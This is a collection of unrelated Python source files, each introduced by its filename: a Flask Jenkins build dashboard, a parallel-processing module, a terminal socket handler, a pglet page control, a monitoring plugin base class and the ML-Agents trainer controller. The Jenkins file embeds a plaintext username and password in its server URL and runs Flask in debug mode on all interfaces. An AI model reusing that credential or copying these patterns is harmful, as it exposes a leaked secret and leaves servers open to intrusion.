JENKINS_URL = 'http://wenxianguo:ZXwxg6235269@jenkins.corp.mama.cn/jenkins'
PROJECT = [
# 18 环境
'post.api.mama.cn',
'qzone.mamaquan.mama.cn_18environment',
'mapi.mama.cn_18environment',
'admin.qzone.mamaquan.mama.cn_18environment',
'q.mama.cn_18environment',
'wap.mama.cn_18environment',
'reader.api.mama.cn_18environment',
'reader.mama.cn_18environment',
'storage.mamaquan.mama.cn_18environment',
'member_reply.mama.cn_18environment',
'feed.api.mama.cn_18environment',
'expert.mama.cn_18environment',
]
PROJECT_55 = [
# 55 环境
'post.api.mama.cn',
'qzone.mamaquan.mama.cn',
'mapi.mama.cn',
'admin.qzone.mamaquan.mama.cn',
'q.mama.cn',
'wap.mama.cn',
'reader.api.mama.cn',
'reader.mama.cn',
'storage.mamaquan.mama.cn',
'member_reply.mama.cn',
'feed.api.mama.cn',
'expert.mama.cn',
'live.mama.cn',
]
CONTENT = []
def show_builds(project=''):
url = '/job/%s/api/json' % project
resposne = requests.post(JENKINS_URL + url)
result = resposne.json()
last_build_num = result['lastBuild']['number']
url = "/job/%s/%s/api/json" % (project, last_build_num)
resposne = requests.post(JENKINS_URL + url)
result = resposne.json()
last_build_username = result['actions'][1]['causes'][0]['userName']
last_build_dateline = str(datetime.datetime.fromtimestamp(int(result['timestamp'] / 1000)))
last_build_branch = result['actions'][0]['parameters'][0]['value']
content = {
'project': project,
'dateline': last_build_dateline,
'username': last_build_username,
'number': last_build_num,
'branch': last_build_branch
}
return CONTENT.append(content)
@app.route('/')
def index():
env = request.args.get('env', '18')
return render_template('jenkins/jenkins.html', env=env)
@app.route('/get_last_builds', methods=['GET'])
def get_last_builds():
try:
global CONTENT
env = request.args.get('env', '18')
projects = PROJECT if env == '18' else PROJECT_55
CONTENT = []
jobs = []
for project in projects:
job = threading.Thread(target=show_builds, args=(project,))
job.setDaemon(True)
job.start()
jobs.append(job)
for job in jobs:
job.join()
return json.dumps(CONTENT)
except Exception as e:
return str(e)
@app.route('/yoda_listen')
def yoda_listen():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(('192.168.55.120', 4730))
s.sendall(b'workers\n')
data = s.recv(2048)
s.close()
data = data.decode('utf-8').rstrip('\n.').split('\n')
occupying = defaultdict(list)
for row in data:
if row.endswith(':'):
number, ip, _, _ = row.split(maxsplit=4)
projects = []
else:
number, ip, _, _, projects = row.split(maxsplit=4)
projects = projects.split()
for project in projects:
if project in ['yoda_tlq_callback', 'yoda_mmq_callback']:
occupying[project].append(ip)
return render_template('jenkins/yoda_listen.html', occupying=occupying)
@app.route('/get_last_build_console', methods=['GET'])
def get_last_build_console():
project = request.args.get('project', '')
number = request.args.get('number', '')
response = requests.get(JENKINS_URL + 'job/%s/%s/consoleText' % (project, number))
print(JENKINS_URL + '/job/%s/%s/consoleText' % (project, number))
return response.content
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
|
parallel.py
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified).
__all__ = ['threaded', 'startthread', 'set_num_threads', 'ThreadPoolExecutor', 'ProcessPoolExecutor', 'parallel',
'run_procs', 'parallel_gen']
# Cell
from .imports import *
from .foundation import *
from .basics import *
from .xtras import *
from functools import wraps
# from contextlib import contextmanager,ExitStack
from multiprocessing import Process, Queue
import concurrent.futures,time
from multiprocessing import Manager
from threading import Thread
# Cell
def threaded(f):
"Run `f` in a thread, and returns the thread"
@wraps(f)
def _f(*args, **kwargs):
res = Thread(target=f, args=args, kwargs=kwargs)
res.start()
return res
return _f
# Cell
def startthread(f):
"Like `threaded`, but start thread immediately"
threaded(f)()
# Cell
def set_num_threads(nt):
"Get numpy (and others) to use `nt` threads"
try: import mkl; mkl.set_num_threads(nt)
except: pass
try: import torch; torch.set_num_threads(nt)
except: pass
os.environ['IPC_ENABLE']='1'
for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']:
os.environ[o] = str(nt)
# Cell
def _call(lock, pause, n, g, item):
l = False
if pause:
try:
l = lock.acquire(timeout=pause*(n+2))
time.sleep(pause)
finally:
if l: lock.release()
return g(item)
# Cell
class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor):
"Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor):
"Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
try: from fastprogress import progress_bar
except: progress_bar = None
# Cell
def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0,
threadpool=False, timeout=None, chunksize=1, **kwargs):
"Applies `func` in parallel to `items`, using `n_workers`"
if progress is None: progress = progress_bar is not None
pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor
with pool(n_workers, pause=pause) as ex:
r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs)
if progress:
if total is None: total = len(items)
r = progress_bar(r, total=total, leave=False)
return L(r)
# Cell
def run_procs(f, f_done, args):
"Call `f` for each item in `args` in parallel, yielding `f_done`"
processes = L(args).map(Process, args=arg0, target=f)
for o in processes: o.start()
yield from f_done()
processes.map(Self.join())
# Cell
def _f_pg(obj, queue, batch, start_idx):
for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b))
def _done_pg(queue, items): return (queue.get() for _ in items)
# Cell
def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs):
"Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel."
if n_workers==0:
yield from enumerate(list(cls(**kwargs)(items)))
return
batches = L(chunked(items, n_chunks=n_workers))
idx = L(itertools.accumulate(0 + batches.map(len)))
queue = Queue()
if progress_bar: items = progress_bar(items, leave=False)
f=partial(_f_pg, cls(**kwargs), queue)
done=partial(_done_pg, queue, items)
yield from run_procs(f, done, L(batches,idx).zip())
|
termhandler.py
|
__author__ = 'jbjohnso'
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2014 Lenovo Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#This file is responsible for a client-side communication method to enable
#capabilities like measuring and rearranging the terminal window for
#wcons
import atexit
import os
import socket
import stat
import threading
class TermHandler(object):
def __init__(self, path):
self.path = path
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.remove(path)
except OSError: # if file does not exist, no big deal
pass
atexit.register(self.shutdown)
self.socket.bind(path)
os.chmod(path, stat.S_IWUSR | stat.S_IRUSR)
th = threading.Thread(target=self.sockinteract)
th.daemon = True
th.start()
def shutdown(self):
try:
os.remove(self.path)
except OSError:
pass
def sockinteract(self):
self.socket.listen(5)
while True:
connection = None
try:
connection, address = self.socket.accept()
connection.sendall("confetty control v1--\n")
cmd = connection.recv(8)
if 'GETWINID' == cmd:
connection.sendall(os.environ['WINDOWID'])
connection.close()
except BaseException:
pass
finally:
if connection is not None:
connection.close()
|
page.py
|
import json
import logging
import threading
from typing import List, Optional
from beartype import beartype
from pglet import constants
from pglet.connection import Connection
from pglet.control import Control
from pglet.control_event import ControlEvent
from pglet.protocol import Command
try:
from typing import Literal
except:
from typing_extensions import Literal
Align = Literal[
None,
"start",
"end",
"center",
"space-between",
"space-around",
"space-evenly",
"baseline",
"stretch",
]
THEME = Literal[None, "light", "dark"]
class Page(Control):
def __init__(self, conn: Connection, session_id):
Control.__init__(self, id="page")
self._conn = conn
self._session_id = session_id
self._controls = [] # page controls
self._index = {} # index with all page controls
self._index[self.id] = self
self._last_event = None
self._event_available = threading.Event()
self._fetch_page_details()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def get_control(self, id):
return self._index.get(id)
def _get_children(self):
return self._controls
def _fetch_page_details(self):
values = self._conn.send_commands(
self._conn.page_name,
self._session_id,
[
Command(0, "get", ["page", "hash"], None, None, None),
Command(0, "get", ["page", "winwidth"], None, None, None),
Command(0, "get", ["page", "winheight"], None, None, None),
Command(0, "get", ["page", "userauthprovider"], None, None, None),
Command(0, "get", ["page", "userid"], None, None, None),
Command(0, "get", ["page", "userlogin"], None, None, None),
Command(0, "get", ["page", "username"], None, None, None),
Command(0, "get", ["page", "useremail"], None, None, None),
Command(0, "get", ["page", "userclientip"], None, None, None),
],
).results
self._set_attr("hash", values[0], False)
self._set_attr("winwidth", values[1], False)
self._set_attr("winheight", values[2], False)
self._set_attr("userauthprovider", values[3], False)
self._set_attr("userid", values[4], False)
self._set_attr("userlogin", values[5], False)
self._set_attr("username", values[6], False)
self._set_attr("useremail", values[7], False)
self._set_attr("userclientip", values[8], False)
def update(self, *controls):
with self._lock:
if len(controls) == 0:
return self.__update(self)
else:
return self.__update(*controls)
def __update(self, *controls):
added_controls = []
commands = []
# build commands
for control in controls:
control.build_update_commands(self._index, added_controls, commands)
if len(commands) == 0:
return
# execute commands
results = self._conn.send_commands(
self._conn.page_name, self._session_id, commands
).results
if len(results) > 0:
n = 0
for line in results:
for id in line.split(" "):
added_controls[n]._Control__uid = id
added_controls[n].page = self
# add to index
self._index[id] = added_controls[n]
n += 1
def add(self, *controls):
with self._lock:
self._controls.extend(controls)
return self.__update(self)
def insert(self, at, *controls):
with self._lock:
n = at
for control in controls:
self._controls.insert(n, control)
n += 1
return self.__update(self)
def remove(self, *controls):
with self._lock:
for control in controls:
self._controls.remove(control)
return self.__update(self)
def remove_at(self, index):
with self._lock:
self._controls.pop(index)
return self.__update(self)
def clean(self):
with self._lock:
self._previous_children.clear()
for child in self._get_children():
self._remove_control_recursively(self._index, child)
self._controls.clear()
return self._send_command("clean", [self.uid])
def error(self, message=""):
with self._lock:
self._send_command("error", [message])
def on_event(self, e):
logging.info(f"page.on_event: {e.target} {e.name} {e.data}")
with self._lock:
if e.target == "page" and e.name == "change":
for props in json.loads(e.data):
id = props["i"]
if id in self._index:
for name in props:
if name != "i":
self._index[id]._set_attr(
name, props[name], dirty=False
)
elif e.target in self._index:
self._last_event = ControlEvent(
e.target, e.name, e.data, self._index[e.target], self
)
handler = self._index[e.target].event_handlers.get(e.name)
if handler:
t = threading.Thread(
target=handler, args=(self._last_event,), daemon=True
)
t.start()
self._event_available.set()
def wait_event(self):
self._event_available.clear()
self._event_available.wait()
return self._last_event
def show_signin(self, auth_providers="*", auth_groups=False, allow_dismiss=False):
with self._lock:
self.signin = auth_providers
self.signin_groups = auth_groups
self.signin_allow_dismiss = allow_dismiss
self.__update(self)
while True:
e = self.wait_event()
if e.control == self and e.name.lower() == "signin":
return True
elif e.control == self and e.name.lower() == "dismisssignin":
return False
def signout(self):
return self._send_command("signout", None)
def can_access(self, users_and_groups):
return (
self._send_command("canAccess", [users_and_groups]).result.lower() == "true"
)
def close(self):
if self._session_id == constants.ZERO_SESSION:
self._conn.close()
def _send_command(self, name: str, values: List[str]):
return self._conn.send_command(
self._conn.page_name,
self._session_id,
Command(0, name, values, None, None, None),
)
# url
@property
def url(self):
return self._conn.page_url
# name
@property
def name(self):
return self._conn.page_name
# connection
@property
def connection(self):
return self._conn
# index
@property
def index(self):
return self._index
# session_id
@property
def session_id(self):
return self._session_id
# controls
@property
def controls(self):
return self._controls
@controls.setter
def controls(self, value):
self._controls = value
# title
@property
def title(self):
return self._get_attr("title")
@title.setter
def title(self, value):
self._set_attr("title", value)
# vertical_fill
@property
def vertical_fill(self):
return self._get_attr("verticalFill", data_type="bool", def_value=False)
@vertical_fill.setter
@beartype
def vertical_fill(self, value: Optional[bool]):
self._set_attr("verticalFill", value)
# horizontal_align
@property
def horizontal_align(self):
return self._get_attr("horizontalAlign")
@horizontal_align.setter
@beartype
def horizontal_align(self, value: Align):
self._set_attr("horizontalAlign", value)
# vertical_align
@property
def vertical_align(self):
return self._get_attr("verticalAlign")
@vertical_align.setter
@beartype
def vertical_align(self, value: Align):
self._set_attr("verticalAlign", value)
# gap
@property
def gap(self):
return self._get_attr("gap")
@gap.setter
@beartype
def gap(self, value: Optional[int]):
self._set_attr("gap", value)
# padding
@property
def padding(self):
return self._get_attr("padding")
@padding.setter
def padding(self, value):
self._set_attr("padding", value)
# bgcolor
@property
def bgcolor(self):
return self._get_attr("bgcolor")
@bgcolor.setter
def bgcolor(self, value):
self._set_attr("bgcolor", value)
# theme
@property
def theme(self):
return self._get_attr("theme")
@theme.setter
@beartype
def theme(self, value: THEME):
self._set_attr("theme", value)
# theme_primary_color
@property
def theme_primary_color(self):
return self._get_attr("themePrimaryColor")
@theme_primary_color.setter
def theme_primary_color(self, value):
self._set_attr("themePrimaryColor", value)
# theme_text_color
@property
def theme_text_color(self):
return self._get_attr("themeTextColor")
@theme_text_color.setter
def theme_text_color(self, value):
self._set_attr("themeTextColor", value)
# theme_background_color
@property
def theme_background_color(self):
return self._get_attr("themeBackgroundColor")
@theme_background_color.setter
def theme_background_color(self, value):
self._set_attr("themeBackgroundColor", value)
# hash
@property
def hash(self):
return self._get_attr("hash")
@hash.setter
def hash(self, value):
self._set_attr("hash", value)
# win_width
@property
def win_width(self):
w = self._get_attr("winwidth")
if w != None and w != "":
return int(w)
return 0
# win_height
@property
def win_height(self):
h = self._get_attr("winheight")
if h != None and h != "":
return int(h)
return 0
# signin
@property
def signin(self):
return self._get_attr("signin")
@signin.setter
def signin(self, value):
self._set_attr("signin", value)
# signin_allow_dismiss
@property
def signin_allow_dismiss(self):
return self._get_attr("signinAllowDismiss", data_type="bool", def_value=False)
@signin_allow_dismiss.setter
@beartype
def signin_allow_dismiss(self, value: Optional[bool]):
self._set_attr("signinAllowDismiss", value)
# signin_groups
@property
def signin_groups(self):
return self._get_attr("signinGroups", data_type="bool", def_value=False)
@signin_groups.setter
@beartype
def signin_groups(self, value: Optional[bool]):
self._set_attr("signinGroups", value)
# user_auth_provider
@property
def user_auth_provider(self):
return self._get_attr("userauthprovider")
# user_id
@property
def user_id(self):
return self._get_attr("userId")
# user_login
@property
def user_login(self):
return self._get_attr("userLogin")
# user_name
@property
def user_name(self):
return self._get_attr("userName")
# user_email
@property
def user_email(self):
return self._get_attr("userEmail")
# user_client_ip
@property
def user_client_ip(self):
return self._get_attr("userClientIP")
# on_signin
@property
def on_signin(self):
return self._get_event_handler("signin")
@on_signin.setter
def on_signin(self, handler):
self._add_event_handler("signin", handler)
# on_dismiss_signin
@property
def on_dismiss_signin(self):
return self._get_event_handler("dismissSignin")
@on_dismiss_signin.setter
def on_dismiss_signin(self, handler):
self._add_event_handler("dismissSignin", handler)
# on_signout
@property
def on_signout(self):
return self._get_event_handler("signout")
@on_signout.setter
def on_signout(self, handler):
self._add_event_handler("signout", handler)
# on_close
@property
def on_close(self):
return self._get_event_handler("close")
@on_close.setter
def on_close(self, handler):
self._add_event_handler("close", handler)
# on_hash_change
@property
def on_hash_change(self):
return self._get_event_handler("hashChange")
@on_hash_change.setter
def on_hash_change(self, handler):
self._add_event_handler("hashChange", handler)
# on_resize
@property
def on_resize(self):
return self._get_event_handler("resize")
@on_resize.setter
def on_resize(self, handler):
self._add_event_handler("resize", handler)
# on_connect
@property
def on_connect(self):
return self._get_event_handler("connect")
@on_connect.setter
def on_connect(self, handler):
self._add_event_handler("connect", handler)
# on_disconnect
@property
def on_disconnect(self):
return self._get_event_handler("disconnect")
@on_disconnect.setter
def on_disconnect(self, handler):
self._add_event_handler("disconnect", handler)
|
plugin.py
|
# -*- coding: utf-8 -*-
import time
import logging
import traceback
import sys
import json
from threading import Thread
from mamonsu.lib.const import Template
class PluginDisableException(Exception):
pass
class Plugin(object):
# can be 'mamonsu' or 'agent'
# type depends on run command
Type = 'mamonsu'
# --plugin-type for zabbix-agent can be: all,postgres,sys
AgentPluginType = 'all'
# PG version
VersionPG = '10'
# Macros for run as agent type or as mamonsu
Macros = {"mamonsu": "", "agent": "{$PG_CONNINFO},{$PG_PATH}"}
# plugin interval run
Interval = 60
# plugin config
DEFAULT_CONFIG = {} # type
_thread = None # type: Thread
_sender = False
_enabled = True
# for all childs
is_child = True
# old_zabbix_server_version
old_zabbix = False
# const
PATH = "/etc/zabbix/zabbix_agentd.d/scripts"
DELTA = Template.DELTA
GRAPH_TYPE = Template.GRAPH_TYPE
VALUE_TYPE = Template.VALUE_TYPE
UNITS = Template.UNITS
TYPE = Template.TYPE
DELTA_SPEED = Template.DELTA.speed_per_second
DELTA_CHANGE = Template.DELTA.simple_change
def __init__(self, config):
self.config = config
self.log = logging.getLogger(
self.__class__.__name__.upper())
self.sender = None
self.last_error_text = ''
# from config => _plugin_config
self._plugin_config = {}
name = self.__class__.__name__.lower()
if self.config.has_plugin_config(name):
for x in self.config.plugin_options(name):
self._plugin_config[x] = self.config.fetch(name, x)
@classmethod
def only_child_subclasses(self):
plugins = []
for klass in self.__subclasses__():
if klass.is_child:
plugins.append(klass)
plugins.extend(klass.only_child_subclasses())
return plugins
@classmethod
def set_default_config(cls, config, interval):
name = cls.__name__.lower()
# if section already loaded via config file
# if not config.has_section(name) and len(cls.DEFAULT_CONFIG) > 0:
if not config.has_section(name):
config.add_section(name)
for x in cls.DEFAULT_CONFIG:
if config.has_option(name, x):
continue
value = cls.DEFAULT_CONFIG[x]
if not isinstance(value, str):
sys.stderr.write(
'Config value {0} in section {1} must'
' be string! Fix plugin please.\n'.format(x, name))
config.set(name, x, '{0}'.format(cls.DEFAULT_CONFIG[x]))
if not config.has_option(name, 'interval') and interval is not None:
config.set(name, 'interval', '{0}'.format(interval))
# get value from config
def plugin_config(self, name, as_json=False):
if name not in self._plugin_config:
return None
if as_json:
return json.loads(self._plugin_config[name])
else:
return self._plugin_config[name]
def start(self):
self._thread = Thread(target=self._loop)
self._thread.daemon = True
self._thread.start()
self.log.info('started ...')
def is_alive(self):
if self._thread is not None:
return self._thread.is_alive()
return False
def run(self, sender):
return None
def is_sender(self):
return self._sender
def get_boolean(self, value):
if value:
if value.upper() in ('FALSE', '0', 'NO', 'F'):
return False
return True
def is_enabled(self):
if self.plugin_config('enabled'):
return self.get_boolean(self.plugin_config('enabled'))
return self._enabled
def disable(self):
self._plugin_config['enabled'] = 'False'
self._enabled = False
def set_sender(self, sender):
self.sender = sender
def items(self, template, dashboard=False):
return None
def graphs(self, template, dashboard=False):
return None
def triggers(self, template, dashboard=False):
return None
def discovery_rules(self, template, dashboard=False):
return None
def keys_and_queries(self, template_zabbix):
return None
def _log_exception(self, e, trace):
self.last_error_text = 'catch error: {0}'.format(e)
self.log.error(self.last_error_text)
self.log.info('hint: enable debug level to full exception trace')
self.log.debug(trace)
def _loop(self):
while True:
last_start = time.time()
try:
self.run(self.sender)
except PluginDisableException as e:
text = 'disable plugin: {0}.'.format(e)
self.log.info(text)
return
except Exception as e:
trace = traceback.format_exc()
# unpack_from error can happen if pg8000 was waiting for the response
# from PostgreSQL on the socket but instead got nothing.
# This error happens either due to an unstable network or if
# PostgreSQL fails to send the results for the last queries while restarting
if "unpack_from requires a buffer" not in trace:
self._log_exception(e, trace)
return
# time interval btw sending metrics
sleep_time = int(self.plugin_config('interval')) - int(time.time() - last_start)
if sleep_time > 0:
time.sleep(sleep_time)
else:
self.log.error(
'Timeout: {0}s'.format(int(time.time() - last_start)))
return
# convert zabbix key to right type: zabbix-trapper or zabbix-agent
def right_type(self, key, var="", var_discovery=""):
if self.Type == "mamonsu":
if len(var_discovery) == 0:
new_key = key.format('[{0}]'.format(var))
else:
new_key = key.format('[{0}{1}]'.format(var, var_discovery[:-1]))
else:
if self.AgentPluginType == 'sys':
if var_discovery != "":
if var == "":
new_key = key.format('{0}[{1}]'.format(var, var_discovery))
else:
new_key = key.format('.{0}[{1}]'.format(var, var_discovery))
else:
if var != "":
new_key = key.format('.{0}'.format(var))
else:
new_key = key.format('')
else:
if var == "":
new_key = key.format('{0}[{1}]'.format(var, var_discovery + self.Macros[self.Type]))
else:
new_key = key.format('.{0}[{1}]'.format(var, var_discovery + self.Macros[self.Type]))
return new_key
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import threading
from typing import Dict, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager, EnvironmentStep
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
UnityCommunicatorStoppedException,
)
from mlagents_envs.timers import (
hierarchical_timer,
timed,
get_timer_stack_for_thread,
merge_gauges,
)
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.environment_parameter_manager import EnvironmentParameterManager
from mlagents.trainers.trainer import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
from mlagents.tf_utils.globals import get_rank
from mlagents import torch_utils
class TrainerController:
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
param_manager: EnvironmentParameterManager,
train: bool,
training_seed: int,
):
"""
:param output_path: Path to save the model.
:param summaries_dir: Folder to save training summaries.
:param run_id: The sub-directory name for model and summary statistics
:param param_manager: EnvironmentParameterManager object which stores information about all
environment parameters.
:param train: Whether to train model, or only run inference.
:param training_seed: Seed to use for Numpy and Tensorflow random number generation.
:param threaded: Whether or not to run trainers in a separate thread. Disable for testing/debugging.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.train_model = train
self.param_manager = param_manager
self.ghost_controller = self.trainer_factory.ghost_controller
self.registered_behavior_ids: Set[str] = set()
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
if torch_utils.is_available():
torch_utils.torch.manual_seed(training_seed)
self.rank = get_rank()
@timed
def _save_models(self):
"""
Saves current model to checkpoint folder.
"""
if self.rank is not None and self.rank != 0:
return
for brain_name in self.trainers.keys():
self.trainers[brain_name].save_model()
self.logger.info("Saved Model")
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env_manager: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
new_config = self.param_manager.get_current_samplers()
env_manager.reset(config=new_config)
# Register any new behavior ids that were generated on the reset.
self._register_new_behaviors(env_manager, env_manager.first_step_infos)
def _not_done_training(self) -> bool:
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
if brain_name in self.trainers:
trainer = self.trainers[brain_name]
else:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.training_behaviors[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.time_horizon,
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
n_steps = self.advance(env_manager)
for _ in range(n_steps):
self.reset_env_if_ready(env_manager)
# Stop advancing trainers
self.join_threads()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
UnityCommunicatorStoppedException,
) as ex:
self.join_threads()
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
if isinstance(ex, KeyboardInterrupt) or isinstance(
ex, UnityCommunicatorStoppedException
):
pass
else:
# If the environment failed, we want to make sure to raise
# the exception so we exit the process with an return code of 1.
raise ex
finally:
if self.train_model:
self._save_models()
def end_trainer_episodes(self) -> None:
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
def reset_env_if_ready(self, env: EnvManager) -> None:
# Get the sizes of the reward buffers.
reward_buff = {k: list(t.reward_buffer) for (k, t) in self.trainers.items()}
curr_step = {k: int(t.step) for (k, t) in self.trainers.items()}
max_step = {k: int(t.get_max_steps) for (k, t) in self.trainers.items()}
# Attempt to increment the lessons of the brains who
# were ready.
updated, param_must_reset = self.param_manager.update_lessons(
curr_step, max_step, reward_buff
)
if updated:
for trainer in self.trainers.values():
trainer.reward_buffer.clear()
# If ghost trainer swapped teams
ghost_controller_reset = self.ghost_controller.should_reset()
if param_must_reset or ghost_controller_reset:
self._reset_env(env) # This reset also sends the new config to env
self.end_trainer_episodes()
elif updated:
env.set_env_parameters(self.param_manager.get_current_samplers())
@timed
def advance(self, env_manager: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
new_step_infos = env_manager.get_steps()
self._register_new_behaviors(env_manager, new_step_infos)
num_steps = env_manager.process_steps(new_step_infos)
# Report current lesson for each environment parameter
for (
param_name,
lesson_number,
) in self.param_manager.get_current_lesson_number().items():
for trainer in self.trainers.values():
trainer.stats_reporter.set_stat(
f"Environment/Lesson Number/{param_name}", lesson_number
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def _register_new_behaviors(
self, env_manager: EnvManager, step_infos: List[EnvironmentStep]
) -> None:
"""
Handle registration (adding trainers and managers) of new behaviors ids.
:param env_manager:
:param step_infos:
:return:
"""
step_behavior_ids: Set[str] = set()
for s in step_infos:
step_behavior_ids |= set(s.name_behavior_ids)
new_behavior_ids = step_behavior_ids - self.registered_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
self.registered_behavior_ids |= step_behavior_ids
def join_threads(self, timeout_seconds: float = 1.0) -> None:
"""
Wait for threads to finish, and merge their timer information into the main thread.
:param timeout_seconds:
:return:
"""
self.kill_trainers = True
for t in self.trainer_threads:
try:
t.join(timeout_seconds)
except Exception:
pass
with hierarchical_timer("trainer_threads") as main_timer_node:
for trainer_thread in self.trainer_threads:
thread_timer_stack = get_timer_stack_for_thread(trainer_thread)
if thread_timer_stack:
main_timer_node.merge(
thread_timer_stack.root,
root_name="thread_root",
is_parallel=True,
)
merge_gauges(thread_timer_stack.gauges)
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
util.py
|
import os
import sys
import time
import threading
import time
from os import system
if os.name == 'nt':
import win32com.client as wincl
import pythoncom
def pythonpath():
return os.environ['PYTHONPATH']
def println(s):
print(s)
def write(s):
sys.stdout.write(s)
sys.stdout.flush()
# from gtts import gTTS
# from tempfile import TemporaryFile, NamedTemporaryFile
# utility functions
def thread(target, args=(), ):
threading.Thread(target=target, args=args).start()
def daemon(target, args=(), ):
threading.Thread(target=target, daemon=True, args=args).start()
is_profiling = False
last_profile_point = False
profile = []
# set a profile point. If profiling is on, this point will be included with the message s
def prof(s):
if is_profiling:
t = time.time()
if len(profile) > 0:
profile.append((t - profile[len(profile) - 1][2], s, t))
else:
profile.append((0, s, t))
# similar to prof(), but this is the starting or end point for a single profile
def main_prof(s):
global last_profile_point, is_profiling
if last_profile_point:
prof(s)
is_profiling = False
last_profile_point = False
print_prof()
profile.clear()
elif is_profiling:
prof(s)
last_profile_point = True
# print the results of a single profile to find out what sections of code are slowing down the algorithm
def print_prof():
print('--------------------')
print('\tprofile')
print('--------------------')
